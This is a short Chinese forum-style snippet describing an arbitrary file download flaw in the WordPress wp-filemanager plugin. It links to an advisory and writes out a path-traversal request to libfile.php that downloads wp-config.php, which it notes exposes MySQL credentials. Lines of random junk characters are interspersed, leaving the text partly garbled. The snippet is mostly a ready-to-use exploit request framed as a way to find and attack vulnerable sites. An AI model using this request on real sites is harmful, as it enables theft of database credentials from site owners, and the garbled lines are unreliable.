洞详解:http://packetstormsecurity.com/f ... -File-Download.html
9 g$ l& U5 X9 k7 x4 z3 @/ g & J& t6 Q; V) e# F2 i" H3 _
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
* i: `3 P: H4 J) g) J0 n7 ] |